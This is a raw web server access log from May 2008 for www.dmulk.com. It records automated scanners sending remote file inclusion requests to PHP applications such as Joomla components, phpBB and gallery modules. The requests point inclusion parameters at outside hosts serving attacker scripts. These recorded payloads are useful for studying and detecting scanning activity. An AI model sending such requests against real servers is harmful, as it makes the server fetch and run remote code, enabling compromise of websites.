82.78.216.197 - - [24/May/2008:12:09:01 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/koeluna/test.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
82.78.216.197 - - [24/May/2008:12:09:01 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/koeluna/test.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
66.7.205.39 - - [24/May/2008:12:09:05 -0700] "GET /logs/access_080121.log//skin/zero_vote/ask_password.php?dir=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.67.26.84 - - [24/May/2008:12:09:14 -0700] "GET /logs/index.php?sub=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [24/May/2008:12:09:14 -0700] "GET /logs/index.php?sub=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.140.12.250 - - [24/May/2008:12:09:31 -0700] "GET /logs/access_080215.log//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.cricketsecrets.com/RSS2B/settings/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [24/May/2008:12:09:34 -0700] "GET /index.php?sub=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/old? HTTP/1.1" 200 11607 "-" "libwww-perl/5.805" "www.dmulk.com"
189.140.12.250 - - [24/May/2008:12:09:34 -0700] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.cricketsecrets.com/RSS2B/settings/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.249.77.90 - - [24/May/2008:12:09:35 -0700] "GET /logs/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.geocities.com/cefill/bangsat/anjing.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.249.77.90 - - [24/May/2008:12:09:35 -0700] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://www.geocities.com/cefill/bangsat/anjing.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.140.12.250 - - [24/May/2008:12:09:37 -0700] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.cricketsecrets.com/RSS2B/settings/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [24/May/2008:12:09:40 -0700] "GET /index.php?sub=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/1? HTTP/1.1" 200 11607 "-" "libwww-perl/5.805" "www.dmulk.com"
64.20.46.121 - - [24/May/2008:12:09:41 -0700] "GET /logs/access_080113.log/errors.php?error=http://www.lynnlott.com/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.20.46.121 - - [24/May/2008:12:09:41 -0700] "GET /logs/errors.php?error=http://www.lynnlott.com/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.20.46.121 - - [24/May/2008:12:09:46 -0700] "GET /logs/access_080122.log/errors.php?error=http://www.lynnlott.com/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.180.89.68 - - [24/May/2008:12:09:48 -0700] "GET /logs/access.log//class/class.dashboard_cms.php=http://201.6.243.67/UP/xs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.180.89.68 - - [24/May/2008:12:09:49 -0700] "GET //class/class.dashboard_cms.php=http://201.6.243.67/UP/xs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.180.89.68 - - [24/May/2008:12:09:49 -0700] "GET /logs//class/class.dashboard_cms.php=http://201.6.243.67/UP/xs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.48.67.39 - - [24/May/2008:12:10:11 -0700] "GET /logs/access_080211.log//skin/zero_vote/ask_password.php?dir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.119.240.143 - - [24/May/2008:12:10:11 -0700] "GET //component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.centenariosafa.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
85.119.240.143 - - [24/May/2008:12:10:11 -0700] "GET /logs//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.centenariosafa.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:12:10:15 -0700] "GET /logs/access_080201.log//ws/login.php?includedir=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:12:10:21 -0700] "GET //ws/login.php?includedir=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:12:10:31 -0700] "GET /logs//ws/login.php?includedir=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.7.147.137 - - [24/May/2008:12:10:32 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
196.7.147.137 - - [24/May/2008:12:10:32 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
87.106.209.176 - - [24/May/2008:12:10:46 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://fizwig.fizwig.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
210.48.67.39 - - [24/May/2008:12:10:48 -0700] "GET /logs/access_080121.log//skin/zero_vote/ask_password.php?dir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.209.176 - - [24/May/2008:12:10:56 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://fizwig.fizwig.com/test.txt? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
72.249.77.90 - - [24/May/2008:12:10:58 -0700] "GET /logs/access_080126.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.geocities.com/cefill/bangsat/anjing.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.16.148.38 - - [24/May/2008:12:11:02 -0700] "GET /logs/access_080218.log/?mosConfig_absolute_path=http://vivace.biz/spe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.16.148.38 - - [24/May/2008:12:11:09 -0700] "GET /logs/?mosConfig_absolute_path=http://vivace.biz/spe.txt?? HTTP/1.1" 200 48843 "-" "libwww-perl/5.79" "www.dmulk.com"
72.249.77.90 - - [24/May/2008:12:11:09 -0700] "GET /logs/access.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.geocities.com/cefill/bangsat/anjing.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.16.148.38 - - [24/May/2008:12:11:18 -0700] "GET /?mosConfig_absolute_path=http://vivace.biz/spe.txt?? HTTP/1.1" 200 11607 "-" "libwww-perl/5.79" "www.dmulk.com"
212.48.105.6 - - [24/May/2008:12:11:26 -0700] "GET /logs/access_080126.log/tarnet/addons/slideshow_full.php?album_name=http://maxbidder.com/uploaded/508/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
212.48.105.6 - - [24/May/2008:12:11:26 -0700] "GET /tarnet/addons/slideshow_full.php?album_name=http://maxbidder.com/uploaded/508/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
212.48.105.6 - - [24/May/2008:12:11:26 -0700] "GET /logs/tarnet/addons/slideshow_full.php?album_name=http://maxbidder.com/uploaded/508/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
209.62.80.134 - - [24/May/2008:12:11:42 -0700] "GET /logs/modules/My_eGallery/public/displayCategory.php?adminpath=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
209.62.80.134 - - [24/May/2008:12:11:42 -0700] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.16.148.38 - - [24/May/2008:12:11:45 -0700] "GET /logs/access_080218.log/?mosConfig_absolute_path=http://vivace.biz/spe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.16.148.38 - - [24/May/2008:12:11:50 -0700] "GET /logs/?mosConfig_absolute_path=http://vivace.biz/spe.txt?? HTTP/1.1" 200 48843 "-" "libwww-perl/5.79" "www.dmulk.com"
72.16.148.38 - - [24/May/2008:12:11:53 -0700] "GET /?mosConfig_absolute_path=http://vivace.biz/spe.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
212.48.105.6 - - [24/May/2008:12:12:09 -0700] "GET /logs/tarnet/addons/slideshow_full.php?album_name=http://maxbidder.com/uploaded/508/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
212.48.105.6 - - [24/May/2008:12:12:10 -0700] "GET /tarnet/addons/slideshow_full.php?album_name=http://maxbidder.com/uploaded/508/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:12:14 -0700] "GET /logs/access_080126.log/tarnet/addons/slideshow_full.php?album_name=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:12:14 -0700] "GET /tarnet/addons/slideshow_full.php?album_name=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:12:14 -0700] "GET /logs/tarnet/addons/slideshow_full.php?album_name=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:12:20 -0700] "GET /logs/access_080313.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:12:20 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:12:21 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.180.89.68 - - [24/May/2008:12:12:23 -0700] "GET /logs/access_080313.log//class/class.dashboard_cms.php=http://201.6.243.67/UP/xs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.15.159.42 - - [24/May/2008:12:12:57 -0700] "GET /logs/access.log//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://bethshemuel.com/cache/cmdAsc[1].txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.15.159.42 - - [24/May/2008:12:12:57 -0700] "GET //component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://bethshemuel.com/cache/cmdAsc[1].txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.15.159.42 - - [24/May/2008:12:12:57 -0700] "GET /logs//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://bethshemuel.com/cache/cmdAsc[1].txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:13:21 -0700] "GET /logs/access_080312.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.48.105.6 - - [24/May/2008:12:13:22 -0700] "GET /logs/access_080217.log/tarnet/addons/slideshow_full.php?album_name=http://maxbidder.com/uploaded/508/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:13:34 -0700] "GET /logs/access_080217.log/tarnet/addons/slideshow_full.php?album_name=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.51.184 - - [24/May/2008:12:14:22 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://sdenova.com/HRtest/include/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
217.64.195.220 - - [24/May/2008:12:14:23 -0700] "GET /logs/access_080412.log/index.php?option=com_custompages&cpage=http://www.comova.org.br/www/media/a2id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.51.184 - - [24/May/2008:12:14:23 -0700] "GET //modules/My_eGallery/index.php?basepath=http://sdenova.com/HRtest/include/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
193.136.6.38 - - [24/May/2008:12:14:47 -0700] "GET //initiate.php?abs_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
193.136.6.38 - - [24/May/2008:12:14:47 -0700] "GET /logs//initiate.php?abs_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:14:54 -0700] "GET /logs/access_080127.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.78.216.197 - - [24/May/2008:12:15:15 -0700] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://www.geocities.com/koeluna/test.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:15:19 -0700] "GET /logs/access_080207.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.78.216.197 - - [24/May/2008:12:15:34 -0700] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://www.geocities.com/koeluna/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
82.78.216.197 - - [24/May/2008:12:15:34 -0700] "GET /logs/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
82.78.216.197 - - [24/May/2008:12:15:34 -0700] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:12:15:45 -0700] "GET /logs/access.log//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:12:15:50 -0700] "GET //component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:12:15:56 -0700] "GET /logs//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.102.242.34 - - [24/May/2008:12:16:02 -0700] "GET /logs/access.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://62.178.28.13/~gpw/modules/Forums/images/ranks/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.102.242.34 - - [24/May/2008:12:16:03 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://62.178.28.13/~gpw/modules/Forums/images/ranks/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.102.242.34 - - [24/May/2008:12:16:03 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://62.178.28.13/~gpw/modules/Forums/images/ranks/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.47.201.117 - - [24/May/2008:12:16:04 -0700] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://h1.ripway.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
72.47.201.117 - - [24/May/2008:12:16:04 -0700] "GET /logs/modules/My_eGallery/public/displayCategory.php?adminpath=http://h1.ripway.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:17:39 -0700] "GET /logs/access_080212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.119.240.143 - - [24/May/2008:12:17:42 -0700] "GET /logs//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [24/May/2008:12:17:43 -0700] "GET //component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.240.231.154 - - [24/May/2008:12:17:44 -0700] "GET /logs/access_080215.log//admin/admin_users.php?phpbb_root_path=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.140.12.250 - - [24/May/2008:12:18:23 -0700] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.cricketsecrets.com/RSS2B/settings/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.209.176 - - [24/May/2008:12:18:23 -0700] "GET /!scanhttp://fizwig.fizwig.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
87.106.209.176 - - [24/May/2008:12:18:23 -0700] "GET /logs/!scanhttp://fizwig.fizwig.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
189.140.12.250 - - [24/May/2008:12:18:24 -0700] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.cricketsecrets.com/RSS2B/settings/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.138.224.8 - - [24/May/2008:12:18:33 -0700] "GET /protection.php?action=logout&siteurl=http://www.b470-killer.kit.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.227 - - [24/May/2008:12:18:35 -0700] "GET /logs/access.log//include/myMailer.class.php?mosConfig_absolute_path=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.227 - - [24/May/2008:12:18:36 -0700] "GET //include/myMailer.class.php?mosConfig_absolute_path=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.227 - - [24/May/2008:12:18:36 -0700] "GET /logs//include/myMailer.class.php?mosConfig_absolute_path=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.244.44.10 - - [24/May/2008:12:19:07 -0700] "GET /logs/index.php?incl=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
72.34.226.62 - - [24/May/2008:12:19:08 -0700] "GET /logs/access_080213.log//codebb/lang_select?phpbb_root_path=http://www.indigonetzwerk.de/mambo/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.34.226.62 - - [24/May/2008:12:19:08 -0700] "GET /logs/access_080213.log//codebb/lang_select?phpbb_root_path=http://www.indigonetzwerk.de/mambo/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.34.226.62 - - [24/May/2008:12:19:08 -0700] "GET //codebb/lang_select?phpbb_root_path=http://www.indigonetzwerk.de/mambo/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.34.226.62 - - [24/May/2008:12:19:08 -0700] "GET //codebb/lang_select?phpbb_root_path=http://www.indigonetzwerk.de/mambo/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.34.226.62 - - [24/May/2008:12:19:08 -0700] "GET /logs//codebb/lang_select?phpbb_root_path=http://www.indigonetzwerk.de/mambo/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.34.226.62 - - [24/May/2008:12:19:08 -0700] "GET /logs//codebb/lang_select?phpbb_root_path=http://www.indigonetzwerk.de/mambo/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.34.226.62 - - [24/May/2008:12:19:08 -0700] "GET /logs/access_080119.log//codebb/lang_select?phpbb_root_path=http://www.indigonetzwerk.de/mambo/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.34.226.62 - - [24/May/2008:12:19:08 -0700] "GET /logs/access_080119.log//codebb/lang_select?phpbb_root_path=http://www.indigonetzwerk.de/mambo/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.244.44.10 - - [24/May/2008:12:19:10 -0700] "GET /index.php?incl=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
209.61.244.6 - - [24/May/2008:12:19:13 -0700] "GET /logs//errors.php?error=http://www.crazywap.co.uk/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
209.61.244.6 - - [24/May/2008:12:19:13 -0700] "GET //errors.php?error=http://www.crazywap.co.uk/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
210.48.67.39 - - [24/May/2008:12:19:20 -0700] "GET /logs/access_080211.log//skin/zero_vote/ask_password.php?dir=http://medisana.co.kr/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [24/May/2008:12:19:20 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://medisana.co.kr/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.47.201.117 - - [24/May/2008:12:19:20 -0700] "GET /logs/index.php?incl=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
72.34.226.62 - - [24/May/2008:12:19:21 -0700] "GET /logs/access_080213.log//codebb/lang_select?phpbb_root_path=http://www.indigonetzwerk.de/mambo/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.34.226.62 - - [24/May/2008:12:19:21 -0700] "GET //codebb/lang_select?phpbb_root_path=http://www.indigonetzwerk.de/mambo/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
